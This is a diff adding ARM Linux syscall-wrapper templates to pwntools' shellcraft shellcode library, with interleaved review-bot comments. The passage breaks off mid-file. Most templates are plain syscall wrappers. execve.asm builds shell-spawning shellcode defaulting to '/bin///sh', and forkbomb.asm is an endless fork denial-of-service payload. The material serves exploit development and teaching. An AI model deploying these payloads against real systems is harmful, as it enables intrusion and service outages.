diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm new file mode 100644 index 000000000..ae7c01763 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_ctl.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="epfd, op, fd, event"/> +<%docstring> +Invokes the syscall epoll_ctl. See 'man 2 epoll_ctl' for more information. + +Arguments: + epfd(int): epfd + op(int): op + fd(int): fd + event(epoll_event): event + + + ${syscall('SYS_epoll_ctl', epfd, op, fd, event)} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm new file mode 100644 index 000000000..720697201 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_pwait.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout, ss"/> +<%docstring> +Invokes the syscall epoll_pwait. See 'man 2 epoll_pwait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + ss(sigset_t): ss + + + ${syscall('SYS_epoll_pwait', epfd, events, maxevents, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm b/pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm new file mode 100644 index 000000000..ef0464b7b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/epoll_wait.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="epfd, events, maxevents, timeout"/> +<%docstring> +Invokes the syscall epoll_wait. See 'man 2 epoll_wait' for more information. + +Arguments: + epfd(int): epfd + events(epoll_event): events + maxevents(int): maxevents + timeout(int): timeout + + + ${syscall('SYS_epoll_wait', epfd, events, maxevents, timeout)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/execve.asm b/pwnlib/shellcraft/templates/arm/linux/execve.asm new file mode 100644 index 000000000..384e001c7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/execve.asm @@ -0,0 +1,26 @@ +<% + from pwnlib.shellcraft import arm + from pwnlib.abi import linux_arm_syscall +%> +<%docstring> +Execute a different process. + +<%page args="path = '/bin///sh', argv=[], envp={}"/> +<% +if isinstance(envp, dict): + envp = ['%s=%s' % (k,v) for (k,v) in envp.items()] + +regs = linux_arm_syscall.register_arguments +%> +% if argv: + ${arm.pushstr_array(regs[2], argv)} +% else: + ${arm.mov(regs[2], 0)} +% endif +% if envp: + ${arm.pushstr_array(regs[3], envp)} +% else: + ${arm.mov(regs[3], 0)} +% endif + ${arm.pushstr(path)} + ${arm.syscall('SYS_execve', 'sp', regs[2], regs[3])} diff --git a/pwnlib/shellcraft/templates/arm/linux/exit.asm b/pwnlib/shellcraft/templates/arm/linux/exit.asm new file mode 100644 index 000000000..ee8cc74d3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/exit.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="status"/> +<%docstring> +Invokes the syscall exit. See 'man 2 exit' for more information. + +Arguments: + status(int): status + + + ${syscall('SYS_exit', status)} diff --git a/pwnlib/shellcraft/templates/arm/linux/faccessat.asm b/pwnlib/shellcraft/templates/arm/linux/faccessat.asm new file mode 100644 index 000000000..b23178ab3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/faccessat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, type, flag"/> +<%docstring> +Invokes the syscall faccessat. See 'man 2 faccessat' for more information. + +Arguments: + fd(int): fd + file(char): file + type(int): type + flag(int): flag + + + ${syscall('SYS_faccessat', fd, file, type, flag)} 
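Review bot: execve.asm calls `${arm.syscall('SYS_execve', 'sp', regs[2], regs[3])}` while every other template in this directory uses `pwnlib.shellcraft.arm.linux.syscall`; if `arm.syscall` only resolves through an OS fallback in the shellcraft loader it works under the Linux context but is inconsistent, so `arm.linux.syscall` would be the safer spelling. The `<%docstring>` sits before `<%page>` and documents none of the arguments; suggest an Arguments section stating that `path` is pushed on the stack (default `/bin///sh`), `argv` is a list of strings or empty for a NULL argv, and `envp` is a list of `KEY=VALUE` strings or a dict that is converted to that form. The `argv=[]` / `envp={}` defaults presumably become shared default objects in the compiled render function, which is harmless here only because neither is mutated; `None` defaults would be the more conventional choice.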
diff --git a/pwnlib/shellcraft/templates/arm/linux/fallocate.asm b/pwnlib/shellcraft/templates/arm/linux/fallocate.asm new file mode 100644 index 000000000..f807f26e3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fallocate.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, mode, offset, len"/> +<%docstring> +Invokes the syscall fallocate. See 'man 2 fallocate' for more information. + +Arguments: + fd(int): fd + mode(int): mode + offset(off_t): offset + len(off_t): len + + + ${syscall('SYS_fallocate', fd, mode, offset, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchdir.asm b/pwnlib/shellcraft/templates/arm/linux/fchdir.asm new file mode 100644 index 000000000..72091451b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fchdir. See 'man 2 fchdir' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fchdir', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchmod.asm b/pwnlib/shellcraft/templates/arm/linux/fchmod.asm new file mode 100644 index 000000000..c11d6b9ed --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchmod.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, mode"/> +<%docstring> +Invokes the syscall fchmod. See 'man 2 fchmod' for more information. + +Arguments: + fd(int): fd + mode(mode_t): mode + + + ${syscall('SYS_fchmod', fd, mode)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchmodat.asm b/pwnlib/shellcraft/templates/arm/linux/fchmodat.asm new file mode 100644 index 000000000..4d6aac9d1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchmodat.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, mode, flag"/> +<%docstring> +Invokes the syscall fchmodat. See 'man 2 fchmodat' for more information. + +Arguments: + fd(int): fd + file(char): file + mode(mode_t): mode + flag(int): flag + + + ${syscall('SYS_fchmodat', fd, file, mode, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchown.asm b/pwnlib/shellcraft/templates/arm/linux/fchown.asm new file mode 100644 index 000000000..b10b775a7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchown.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, owner, group"/> +<%docstring> +Invokes the syscall fchown. See 'man 2 fchown' for more information. + +Arguments: + fd(int): fd + owner(uid_t): owner + group(gid_t): group + + + ${syscall('SYS_fchown', fd, owner, group)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fchownat.asm b/pwnlib/shellcraft/templates/arm/linux/fchownat.asm new file mode 100644 index 000000000..b4cec961c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fchownat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, owner, group, flag"/> +<%docstring> +Invokes the syscall fchownat. See 'man 2 fchownat' for more information. + +Arguments: + fd(int): fd + file(char): file + owner(uid_t): owner + group(gid_t): group + flag(int): flag + + + ${syscall('SYS_fchownat', fd, file, owner, group, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fcntl.asm b/pwnlib/shellcraft/templates/arm/linux/fcntl.asm new file mode 100644 index 000000000..ca4a45ece --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fcntl.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, cmd, vararg"/> +<%docstring> +Invokes the syscall fcntl. See 'man 2 fcntl' for more information. + +Arguments: + fd(int): fd + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_fcntl', fd, cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fdatasync.asm b/pwnlib/shellcraft/templates/arm/linux/fdatasync.asm new file mode 100644 index 000000000..a0773cdfc --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fdatasync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fildes"/> +<%docstring> +Invokes the syscall fdatasync. See 'man 2 fdatasync' for more information. + +Arguments: + fildes(int): fildes + + + ${syscall('SYS_fdatasync', fildes)} diff --git a/pwnlib/shellcraft/templates/arm/linux/flock.asm b/pwnlib/shellcraft/templates/arm/linux/flock.asm new file mode 100644 index 000000000..660503dd7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fork.asm b/pwnlib/shellcraft/templates/arm/linux/fork.asm new file mode 100644 index 000000000..2b44441b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} diff --git a/pwnlib/shellcraft/templates/arm/linux/forkbomb.asm b/pwnlib/shellcraft/templates/arm/linux/forkbomb.asm new file mode 100644 index 000000000..3fd9ea57f --- /dev/null 
+++ b/pwnlib/shellcraft/templates/arm/linux/forkbomb.asm @@ -0,0 +1,13 @@ +<% + from pwnlib.shellcraft.arm.linux import fork + from pwnlib.shellcraft.common import label +%> +<%docstring> +Performs a forkbomb attack. + +<% + dosloop = label('fork_bomb') +%> +${dosloop}: + ${fork()} + b ${dosloop} diff --git a/pwnlib/shellcraft/templates/arm/linux/forkexit.asm b/pwnlib/shellcraft/templates/arm/linux/forkexit.asm new file mode 100644 index 000000000..f2b4561ee --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/forkexit.asm @@ -0,0 +1,16 @@ +<% + from pwnlib.shellcraft import common + from pwnlib.shellcraft.arm.linux import fork, exit +%> +<%page args=""/> +<%docstring> +Attempts to fork. If the fork is successful, the parent exits. + +<% +dont_exit = common.label('forkexit') +%> + ${fork()} + cmp r0, 1 + blt ${dont_exit} + ${exit(0)} +${dont_exit}: diff --git a/pwnlib/shellcraft/templates/arm/linux/fstat.asm b/pwnlib/shellcraft/templates/arm/linux/fstat.asm new file mode 100644 index 000000000..6d67bbc2d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fstat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat. See 'man 2 fstat' for more information. + +Arguments: + fd(int): fd + buf(stat): buf + + + ${syscall('SYS_fstat', fd, buf)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fstat64.asm b/pwnlib/shellcraft/templates/arm/linux/fstat64.asm new file mode 100644 index 000000000..4f63f45e8 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fstat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} 
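Review bot: The `cmp r0, 1` / `blt ${dont_exit}` test in forkexit.asm is a signed compare, so a failed fork (r0 = -errno) takes the same path as the child and the single remaining process simply continues, while the docstring only describes the success case. If that is the intended best-effort behaviour, say so in the docstring: `If fork() fails (negative r0), the current process continues as if it were the child.` Otherwise a separate branch for the negative case is needed before the `${exit(0)}` so that a failure is not silently treated as success.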
diff --git a/pwnlib/shellcraft/templates/arm/linux/fstatat64.asm b/pwnlib/shellcraft/templates/arm/linux/fstatat64.asm new file mode 100644 index 000000000..24007f399 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/arm/linux/fsync.asm b/pwnlib/shellcraft/templates/arm/linux/fsync.asm new file mode 100644 index 000000000..bc044d318 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ftruncate.asm b/pwnlib/shellcraft/templates/arm/linux/ftruncate.asm new file mode 100644 index 000000000..888856e9e --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm new file mode 100644 index 000000000..1174f2c9c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ftruncate64.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/arm/linux/futimesat.asm b/pwnlib/shellcraft/templates/arm/linux/futimesat.asm new file mode 100644 index 000000000..97406fc8d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getcwd.asm b/pwnlib/shellcraft/templates/arm/linux/getcwd.asm new file mode 100644 index 000000000..f5a593791 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getdents.asm b/pwnlib/shellcraft/templates/arm/linux/getdents.asm new file mode 100644 index 000000000..6bd74d074 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getdents.asm @@ -0,0 +1,14 @@ +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, dirp, count"/> +<%docstring> +Invokes the syscall getdents. See 'man 2 getdents' for more information. + +Arguments: + fd(int): fd + dirp(int): dirp + count(int): count + + + ${syscall('SYS_getdents', fd, dirp, count)} 
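Review bot: The Arguments section in getdents.asm documents `dirp(int)` although getdents(2) takes a pointer to the output buffer, and the generated wrappers elsewhere in this commit name pointer arguments by their C type (`buf(stat)`, `event(epoll_event)`); suggest `dirp(void*): buffer that receives the dirent records` and `count(int): size of that buffer in bytes`. Since dir.asm is built on this template, a line stating that the result (bytes read, or a negative errno) is left in r0 would also help callers.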
diff --git a/pwnlib/shellcraft/templates/arm/linux/getegid.asm b/pwnlib/shellcraft/templates/arm/linux/getegid.asm new file mode 100644 index 000000000..b492c9103 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getegid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/geteuid.asm b/pwnlib/shellcraft/templates/arm/linux/geteuid.asm new file mode 100644 index 000000000..1455d3d42 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getgid.asm b/pwnlib/shellcraft/templates/arm/linux/getgid.asm new file mode 100644 index 000000000..1e6214040 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getgroups.asm b/pwnlib/shellcraft/templates/arm/linux/getgroups.asm new file mode 100644 index 000000000..7b4394277 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/getitimer.asm b/pwnlib/shellcraft/templates/arm/linux/getitimer.asm new file mode 100644 index 000000000..790d96be0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getitimer.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpeername.asm b/pwnlib/shellcraft/templates/arm/linux/getpeername.asm new file mode 100644 index 000000000..a8beb00c3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpgid.asm b/pwnlib/shellcraft/templates/arm/linux/getpgid.asm new file mode 100644 index 000000000..81a2484ce --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpgrp.asm b/pwnlib/shellcraft/templates/arm/linux/getpgrp.asm new file mode 100644 index 000000000..bb2788434 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpgrp.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpid.asm b/pwnlib/shellcraft/templates/arm/linux/getpid.asm new file mode 100644 index 000000000..4659d180f --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpid. See 'man 2 getpid' for more information. + +Arguments: + + + + ${syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpmsg.asm b/pwnlib/shellcraft/templates/arm/linux/getpmsg.asm new file mode 100644 index 000000000..9a7ad27a4 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getppid.asm b/pwnlib/shellcraft/templates/arm/linux/getppid.asm new file mode 100644 index 000000000..9df7d8e08 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/getpriority.asm b/pwnlib/shellcraft/templates/arm/linux/getpriority.asm new file mode 100644 index 000000000..d12951854 --- /dev/null 
+++ b/pwnlib/shellcraft/templates/arm/linux/getpriority.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getresgid.asm b/pwnlib/shellcraft/templates/arm/linux/getresgid.asm new file mode 100644 index 000000000..57ebc84ec --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getresuid.asm b/pwnlib/shellcraft/templates/arm/linux/getresuid.asm new file mode 100644 index 000000000..dc898afbe --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getrlimit.asm b/pwnlib/shellcraft/templates/arm/linux/getrlimit.asm new file mode 100644 index 000000000..39f400d09 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getrlimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getrusage.asm b/pwnlib/shellcraft/templates/arm/linux/getrusage.asm new file mode 100644 index 000000000..776fc95b6 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getsid.asm b/pwnlib/shellcraft/templates/arm/linux/getsid.asm new file mode 100644 index 000000000..27287816b --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getsockname.asm b/pwnlib/shellcraft/templates/arm/linux/getsockname.asm new file mode 100644 index 000000000..fda3e1de3 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} 
diff --git a/pwnlib/shellcraft/templates/arm/linux/getsockopt.asm b/pwnlib/shellcraft/templates/arm/linux/getsockopt.asm new file mode 100644 index 000000000..0498b6ffc --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm new file mode 100644 index 000000000..486aebce0 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/arm/linux/getuid.asm b/pwnlib/shellcraft/templates/arm/linux/getuid.asm new file mode 100644 index 000000000..02b9e9de1 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/arm/linux/gtty.asm b/pwnlib/shellcraft/templates/arm/linux/gtty.asm new file mode 100644 index 000000000..962038b9d --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/gtty.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ioctl.asm b/pwnlib/shellcraft/templates/arm/linux/ioctl.asm new file mode 100644 index 000000000..cf6e4ffc7 --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/arm/linux/ioperm.asm b/pwnlib/shellcraft/templates/arm/linux/ioperm.asm new file mode 100644 index 000000000..a3d956d0c --- /dev/null +++ b/pwnlib/shellcraft/templates/arm/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.arm.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): 